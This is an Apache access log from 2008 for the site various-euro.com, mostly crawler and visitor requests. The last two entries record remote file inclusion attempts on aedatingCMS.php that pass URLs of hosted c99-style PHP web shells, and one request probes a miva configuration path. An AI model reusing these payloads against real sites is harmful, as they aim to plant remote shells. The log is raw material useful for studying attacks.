77.105.10.66 - - [19/Feb/2008:23:03:43 +0100] "GET /bannerz/neon_click_3.gif HTTP/1.1" 200 240 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:03:47 +0100] "GET /frame-inhalt.html HTTP/1.1" 200 6025 "http://www.various-euro.com/frame-menu.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:03:53 +0100] "GET /bannerz/neon_click_3.gif HTTP/1.1" 200 240 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:03:58 +0100] "GET /bannerz/ascii-lt.gif HTTP/1.1" 200 1049 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:04:02 +0100] "GET /eurosign3.gif HTTP/1.1" 200 7879 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:04:11 +0100] "GET /bannerz/neon_click_1.gif HTTP/1.1" 200 890 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:02:43 +0100] "GET /bannerz/ubu-shot.png HTTP/1.1" 200 200117 "http://www.various-euro.com/frame-menu.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:04:13 +0100] "GET /bannerz/wet.gif HTTP/1.1" 200 18561 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:04:20 +0100] "GET /bannerz/google/Logo_40blk.gif HTTP/1.1" 200 2308 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:04:21 +0100] "GET /bannerz/neon_click_2.gif HTTP/1.1" 200 387 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:04:22 +0100] "GET /bannerz/douwil.gif HTTP/1.1" 200 528 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:04:22 +0100] "GET /bannerz/anti_black_small.gif HTTP/1.1" 200 1009 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:04:22 +0100] "GET /bannerz/copyleft_black_small.gif HTTP/1.1" 200 1231 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
66.249.67.80 - - [19/Feb/2008:23:29:06 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.80 - - [19/Feb/2008:23:29:06 +0100] "GET /your_tour.html HTTP/1.1" 200 29413 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.212.216 - - [19/Feb/2008:23:36:40 +0100] "GET /3dsf3/sendi/slike/1_d_VLADA.jpg HTTP/1.0" 200 24610 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [19/Feb/2008:23:38:27 +0100] "GET /3dsf3/sendi/slike/1_b_RENA.jpg HTTP/1.0" 200 41317 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [19/Feb/2008:23:38:28 +0100] "GET /3dsf3/sendi/slike/9_l_RENA.jpg HTTP/1.0" 200 32370 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [19/Feb/2008:23:38:29 +0100] "GET /3dsf3/sendi/slike/4_k_RENA.jpg HTTP/1.0" 200 47525 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [19/Feb/2008:23:42:44 +0100] "GET /bannerz/army_graphics_package/rpk-n.gif HTTP/1.0" 200 7872 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [19/Feb/2008:23:42:44 +0100] "GET /bannerz/army_graphics_package/ak47su-n.gif HTTP/1.0" 200 9823 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [19/Feb/2008:23:42:47 +0100] "GET /3dsf3/sendi/rituals.html HTTP/1.0" 200 1411 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [19/Feb/2008:23:43:52 +0100] "GET /3dsf3/sendi/slike/8_g_RENA.jpg HTTP/1.0" 200 36687 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [19/Feb/2008:23:50:59 +0100] "GET /3dsf3/sendi/slike/6_p_VLADA.jpg HTTP/1.0" 200 23436 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [19/Feb/2008:23:54:37 +0100] "GET /vgirls/vgirl31.gif HTTP/1.0" 200 17770 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [19/Feb/2008:23:54:38 +0100] "GET /bannerz/army_graphics_package/m249-n.gif HTTP/1.0" 200 7658 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [20/Feb/2008:00:03:47 +0100] "GET /3dsf3/sendi/slike/6_c_RENA.jpg HTTP/1.0" 200 34470 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [20/Feb/2008:00:08:27 +0100] "GET /bannerz/army_graphics_package/dragunov-n.gif HTTP/1.0" 200 5431 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [20/Feb/2008:00:18:07 +0100] "GET /neon/dollar.gif HTTP/1.0" 200 58439 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [20/Feb/2008:00:18:08 +0100] "GET /3dsf3/sendi/slike/9_h_VLADA.jpg HTTP/1.0" 200 20206 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [20/Feb/2008:00:18:08 +0100] "GET /3dsf3/sendi/slike/3_f_RENA.jpg HTTP/1.0" 200 51200 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [20/Feb/2008:00:18:09 +0100] "GET /3dsf3/sendi/slike/7_i_RENA.jpg HTTP/1.0" 200 35940 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [20/Feb/2008:00:18:10 +0100] "GET /3dsf3/sendi/slike/2_j_Rena.jpg HTTP/1.0" 200 58319 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [20/Feb/2008:00:18:11 +0100] "GET /3dsf3/sendi/slike/10_VLADA.jpg HTTP/1.0" 200 26977 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [20/Feb/2008:00:18:14 +0100] "GET /bannerz/army_graphics_package/m4a1-n.gif HTTP/1.0" 200 9356 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [20/Feb/2008:00:18:15 +0100] "GET /bannerz/schii.gif HTTP/1.0" 200 10816 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [20/Feb/2008:00:18:15 +0100] "GET /bannerz/army_graphics_package/m24-n.gif HTTP/1.0" 200 5038 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.100 - - [20/Feb/2008:00:32:12 +0100] "GET /robots.txt HTTP/1.1" 302 363 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.100 - - [20/Feb/2008:00:32:13 +0100] "GET /zampa/robots.txt HTTP/1.1" 404 2748 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.100 - - [20/Feb/2008:00:32:13 +0100] "GET /montenegro/dajpare.html HTTP/1.1" 302 376 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.100 - - [20/Feb/2008:00:32:14 +0100] "GET /lybia/index.html HTTP/1.1" 302 369 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.103 - - [20/Feb/2008:00:33:55 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.103 - - [20/Feb/2008:00:33:55 +0100] "GET /3dsf3/sendi/utopia.html HTTP/1.1" 200 1295 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.103 - - [20/Feb/2008:00:33:56 +0100] "GET /3dsf3/sendi/sacrifice.html HTTP/1.1" 200 1309 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.100 - - [20/Feb/2008:00:37:40 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.100 - - [20/Feb/2008:00:37:40 +0100] "GET /zampa/montenegro/dajpare.html HTTP/1.1" 200 2503 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.100 - - [20/Feb/2008:00:37:41 +0100] "GET /zampa/lybia/index.html HTTP/1.1" 200 3036 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
74.6.23.109 - - [20/Feb/2008:01:35:14 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.28.20 - - [20/Feb/2008:01:35:15 +0100] "GET /bmpp/euro_pal_1.html HTTP/1.0" 200 18252 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.20.163 - - [20/Feb/2008:01:57:26 +0100] "GET /DgH/ HTTP/1.0" 200 5024 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.212.216 - - [20/Feb/2008:02:13:33 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [20/Feb/2008:02:13:33 +0100] "GET /3dsf3/sendi/slike/5_m_RENA.jpg HTTP/1.0" 200 30297 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [20/Feb/2008:02:14:52 +0100] "GET /3dsf3/sendi/slike/5_a_VLADA.jpg HTTP/1.0" 200 33115 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
68.222.52.10 - - [20/Feb/2008:02:18:12 +0100] "POST http://various-euro.com/cgi-bin/miva?/cgi-bin/miva.conf HTTP/1.0" 404 2748 "http://various-euro.com/cgi-bin/miva?/cgi-bin/miva.conf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
131.107.151.157 - - [20/Feb/2008:02:24:16 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "MSRBOT (http://research.microsoft.com/research/sv/msrbot/"
74.6.23.233 - - [20/Feb/2008:02:39:34 +0100] "GET /games/virtualcop/ HTTP/1.0" 403 1223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.67.80 - - [20/Feb/2008:02:44:55 +0100] "GET /bmpp/euro_pal_1.html HTTP/1.1" 200 18252 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.24.160 - - [20/Feb/2008:03:01:31 +0100] "GET /neon/girlz2.html HTTP/1.0" 200 2937 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.67.80 - - [20/Feb/2008:03:45:47 +0100] "GET /zampa/ HTTP/1.1" 200 7153 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
64.1.215.165 - - [20/Feb/2008:04:27:27 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)"
65.55.209.104 - - [20/Feb/2008:04:29:54 +0100] "GET /robots.txt HTTP/1.1" 302 363 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.104 - - [20/Feb/2008:04:29:54 +0100] "GET /zampa/robots.txt HTTP/1.1" 404 2748 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.104 - - [20/Feb/2008:04:29:55 +0100] "GET /montenegro/index.html HTTP/1.1" 302 374 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
68.142.212.171 - - [20/Feb/2008:04:36:06 +0100] "GET /robots.txt HTTP/1.0" 302 363 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)"
65.55.209.104 - - [20/Feb/2008:04:37:10 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.104 - - [20/Feb/2008:04:37:10 +0100] "GET /zampa/montenegro/index.html HTTP/1.1" 200 2651 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
64.1.215.165 - - [20/Feb/2008:04:39:27 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)"
74.6.26.81 - - [20/Feb/2008:05:14:03 +0100] "GET /partnergegenberlin.html HTTP/1.0" 200 5022 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
131.107.151.157 - - [20/Feb/2008:05:27:12 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "MSRBOT (http://research.microsoft.com/research/sv/msrbot/"
74.6.29.34 - - [20/Feb/2008:05:46:30 +0100] "GET /neon/click.html HTTP/1.0" 200 521 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
193.252.149.16 - - [20/Feb/2008:06:06:00 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
193.252.149.16 - - [20/Feb/2008:06:06:06 +0100] "GET /neon/sushi.html HTTP/1.1" 200 687 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
193.252.149.16 - - [20/Feb/2008:06:06:42 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
193.252.149.16 - - [20/Feb/2008:06:06:44 +0100] "GET /neon/biggtani.html HTTP/1.1" 200 1698 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
66.249.67.80 - - [20/Feb/2008:06:31:22 +0100] "GET /f-maintitle.html HTTP/1.1" 200 5030 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.195.44.110 - - [20/Feb/2008:06:37:56 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.44.85 - - [20/Feb/2008:06:37:57 +0100] "GET /framez-rez.html HTTP/1.0" 200 4323 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.44.85 - - [20/Feb/2008:06:37:58 +0100] "GET /frame-menu.html HTTP/1.0" 200 10763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.44.85 - - [20/Feb/2008:06:37:59 +0100] "GET /f-rez.html HTTP/1.0" 200 9765 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.44.85 - - [20/Feb/2008:06:38:00 +0100] "GET /frame-unten.html HTTP/1.0" 200 5557 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.28.203 - - [20/Feb/2008:06:47:51 +0100] "GET /games/3dswat/ HTTP/1.0" 403 1223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
81.52.143.16 - - [20/Feb/2008:06:53:04 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
81.52.143.16 - - [20/Feb/2008:06:53:08 +0100] "GET /bmpp/18_x.html HTTP/1.1" 200 1100 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
80.253.81.20 - - [20/Feb/2008:06:57:02 +0100] "GET / HTTP/1.1" 200 10335 "-" "Microsoft URL Control - 6.00.8862"
74.6.7.149 - - [20/Feb/2008:07:11:25 +0100] "GET /zampa/montenegro/ZMAJW.html HTTP/1.0" 200 860 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
193.252.149.15 - - [20/Feb/2008:07:47:39 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
193.252.149.15 - - [20/Feb/2008:07:47:43 +0100] "GET /neon/slow-walk2.html HTTP/1.1" 200 1777 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
66.249.67.80 - - [20/Feb/2008:07:55:41 +0100] "GET /f-net.html HTTP/1.1" 200 9913 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.36.144.10 - - [20/Feb/2008:08:01:33 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)"
81.52.143.16 - - [20/Feb/2008:08:27:23 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
81.52.143.16 - - [20/Feb/2008:08:27:25 +0100] "GET /bmpp/18.html HTTP/1.1" 200 4467 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
66.249.67.80 - - [20/Feb/2008:09:19:54 +0100] "GET /neon/channel.html HTTP/1.1" 200 1942 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.252.149.15 - - [20/Feb/2008:09:30:10 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
193.252.149.15 - - [20/Feb/2008:09:30:16 +0100] "GET /neon/slow-walk.html HTTP/1.1" 200 1640 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
193.5.216.100 - - [20/Feb/2008:10:33:18 +0100] "GET /favicon.ico HTTP/1.0" 404 2748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
193.5.216.100 - - [20/Feb/2008:10:33:18 +0100] "GET /favicon.ico HTTP/1.0" 404 2748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
193.5.216.100 - - [20/Feb/2008:10:33:19 +0100] "GET /schubb/schubb-3.html HTTP/1.0" 200 17546 "http://search.msn.ch/results.aspx?q=Fabius+von+Gugel&first=11&FORM=PERE" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
193.5.216.100 - - [20/Feb/2008:10:33:19 +0100] "GET /schubb/schubb-3.gif HTTP/1.0" 200 2287 "http://www.various-euro.com/schubb/schubb-3.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
193.5.216.100 - - [20/Feb/2008:10:33:19 +0100] "GET /favicon.ico HTTP/1.0" 404 2748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
193.5.216.100 - - [20/Feb/2008:10:33:20 +0100] "GET /framez-schubb3.html HTTP/1.0" 200 4317 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
193.5.216.100 - - [20/Feb/2008:10:33:20 +0100] "GET /frame-menu.html HTTP/1.0" 200 10763 "http://www.various-euro.com/framez-schubb3.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
193.5.216.100 - - [20/Feb/2008:10:33:20 +0100] "GET /schubb/schubb-3.html HTTP/1.0" 200 17546 "http://www.various-euro.com/framez-schubb3.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
193.5.216.100 - - [20/Feb/2008:10:33:20 +0100] "GET /bannerz/ubu-shot.png HTTP/1.0" 200 200117 "http://www.various-euro.com/frame-menu.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
193.5.216.100 - - [20/Feb/2008:10:33:20 +0100] "GET /frame-unten.html HTTP/1.0" 200 5557 "http://www.various-euro.com/framez-schubb3.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
193.5.216.100 - - [20/Feb/2008:10:33:21 +0100] "GET /favicon.ico HTTP/1.0" 404 2748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
193.5.216.100 - - [20/Feb/2008:10:33:21 +0100] "GET /bannerz/various-euro-girl.jpg HTTP/1.0" 200 91514 "http://www.various-euro.com/frame-unten.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
193.5.216.100 - - [20/Feb/2008:10:33:21 +0100] "GET /bannerz/ve.jpg HTTP/1.0" 200 36912 "http://www.various-euro.com/frame-unten.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
66.249.67.80 - - [20/Feb/2008:10:45:16 +0100] "GET /world.html HTTP/1.1" 200 16295 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.252.149.15 - - [20/Feb/2008:10:58:36 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
193.252.149.15 - - [20/Feb/2008:10:58:38 +0100] "GET /neon/europa.html HTTP/1.1" 200 389 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
74.6.22.139 - - [20/Feb/2008:11:04:49 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.139 - - [20/Feb/2008:11:04:49 +0100] "GET /f-maintitle.html HTTP/1.0" 200 5030 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.139 - - [20/Feb/2008:11:33:33 +0100] "GET /restate_copy.html HTTP/1.0" 200 97631 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.67.80 - - [20/Feb/2008:12:09:14 +0100] "GET /e-counter.html HTTP/1.1" 200 4047 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.91.224.15 - - [20/Feb/2008:12:38:52 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)"
77.91.224.15 - - [20/Feb/2008:12:38:52 +0100] "GET / HTTP/1.1" 200 10335 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)"
65.55.209.103 - - [20/Feb/2008:12:58:27 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.103 - - [20/Feb/2008:12:58:27 +0100] "GET /zampa/montenegro/ HTTP/1.1" 200 2651 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
74.6.22.139 - - [20/Feb/2008:13:08:29 +0100] "GET /f-rez.html HTTP/1.0" 200 9765 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.209.99 - - [20/Feb/2008:13:18:46 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.99 - - [20/Feb/2008:13:18:49 +0100] "GET /f-logz.html HTTP/1.1" 200 191844 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
66.249.67.80 - - [20/Feb/2008:13:34:41 +0100] "GET /schubb/schubb-5.html HTTP/1.1" 200 72944 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.252.149.15 - - [20/Feb/2008:14:05:55 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
193.252.149.15 - - [20/Feb/2008:14:05:57 +0100] "GET /bmpp/euro_pal_111.html HTTP/1.1" 200 2129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
74.6.22.139 - - [20/Feb/2008:14:16:44 +0100] "GET /bmpp/euro_pal_1.html HTTP/1.0" 200 18252 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.67.80 - - [20/Feb/2008:14:59:31 +0100] "GET /triple-double-u/ HTTP/1.1" 403 1223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.80 - - [20/Feb/2008:15:44:08 +0100] "GET /zampa-lovers/ HTTP/1.1" 200 37790 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
82.237.212.168 - - [20/Feb/2008:15:49:36 +0100] "GET http://various-euro.com/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.usuarios.lycos.es/liurap/shells/c99.txt? HTTP/1.0" 404 2748 "http://various-euro.com/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.usuarios.lycos.es/liurap/shells/c99.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
82.237.212.168 - - [20/Feb/2008:15:49:37 +0100] "GET http://various-euro.com/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.geocities.com/csound74/SHELLS/shellchepi.txt? HTTP/1.0" 404 2748 "http://various-euro.com/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.geocities.com/csound74/SHELLS/shellchepi.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
